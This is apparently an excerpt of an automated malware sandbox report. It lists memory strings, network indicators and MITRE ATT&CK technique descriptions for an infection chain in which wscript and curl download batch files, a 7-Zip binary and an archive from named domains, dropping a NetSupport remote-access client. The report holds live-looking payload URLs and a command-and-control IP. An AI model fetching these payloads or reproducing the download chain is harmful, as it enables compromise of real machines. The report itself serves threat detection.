Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: wscript.exe, 00000000.00000002.588248467.0000021D8FAC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: client32.exe, 00000012.00000003.601016833.0000000001318000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600887260.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000012.00000003.596596763.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592834653.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597255352.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075040257.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.599027545.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.593770160.00000000059B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595066226.00000000059BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597068792.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600308055.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595961065.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600433827.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597354785.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595846294.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597234235.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596926524.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596211876.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.601282825.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600887260.00000000059F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp:j
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000012.00000003.600308055.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600433827.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600887260.00000000059F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspTrap
Source: client32.exe, 00000012.00000003.591847369.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596596763.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592834653.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.599027545.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.593770160.00000000059B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592400717.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595066226.00000000059BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597068792.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.590890417.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597354785.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595846294.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597234235.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596926524.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596211876.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592266720.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspht
Source: client32.exe, 00000012.00000003.591847369.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596596763.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592834653.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.599027545.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.593770160.00000000059B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592400717.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595066226.00000000059BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597068792.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.590890417.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597354785.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.595846294.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.597234235.00000000059E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596926524.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.596211876.00000000059A1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.592266720.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspmB
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: http://s2.symcb.com0
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://sf.symcd.com0&
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: http://sv.symcd.com0&
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
Source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	String found in binary or memory: http://www.netsupportsoftware.com
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, client32.exe.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, client32.exe.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.dr, PCICL32.DLL.15.dr, PCICHEK.DLL.15.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: wscript.exe, 00000000.00000003.587018717.0000021D8FD03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588803421.0000021D8FD05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.554101851.0000021D8DA24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://magydostravel.com/8
Source: wscript.exe, 00000000.00000003.554133377.0000021D8D9F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588198047.0000021D8F6F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588155785.0000021D8DBF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php
Source: CacheURL.dat.15.dr	String found in binary or memory: https://magydostravel.com/cdn/zwmrqqgqnaww.php
Source: wscript.exe, 00000000.00000003.587018717.0000021D8FD03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588803421.0000021D8FD05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/
Source: wscript.exe, 00000000.00000002.588198047.0000021D8F6F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588155785.0000021D8DBF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250
Source: wscript.exe, 00000000.00000002.588803421.0000021D8FD16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588926321.0000021D90225000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?4
Source: curl.exe, 00000008.00000002.566444166.000001E004520000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.566104709.000001E00455A000.00000004.00000020.00020000.00000000.sdmp, fyAAWPXvDMiNSTKqVPpzzNr.bat.0.dr, 11[1].bat.0.dr	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat
Source: curl.exe, 00000008.00000002.566444166.000001E004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-o
Source: curl.exe, 00000006.00000002.564520921.000002519C800000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.564546747.000002519C83B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.564307701.000002519C83B000.00000004.00000020.00020000.00000000.sdmp, fyAAWPXvDMiNSTKqVPpzzNr.bat.0.dr, 11[1].bat.0.dr, 7z.bat.1.dr	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe
Source: curl.exe, 00000006.00000002.564520921.000002519C800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-
Source: curl.exe, 00000004.00000002.561363860.0000024355B80000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.560917841.0000024355B9F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.561421492.0000024355BBB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.560939503.0000024355BA2000.00000004.00000020.00020000.00000000.sdmp, sett.bat.1.dr, fyAAWPXvDMiNSTKqVPpzzNr.bat.0.dr, 11[1].bat.0.dr	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z
Source: curl.exe, 00000004.00000002.561363860.0000024355B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-
Source: curl.exe, 00000004.00000003.560917841.0000024355B9F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.561421492.0000024355BBB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.560939503.0000024355BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z~
Source: wscript.exe, 00000000.00000003.587018717.0000021D8FD03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588803421.0000021D8FD05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mangoairsoft.com/U
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: 7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.158.247.23

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

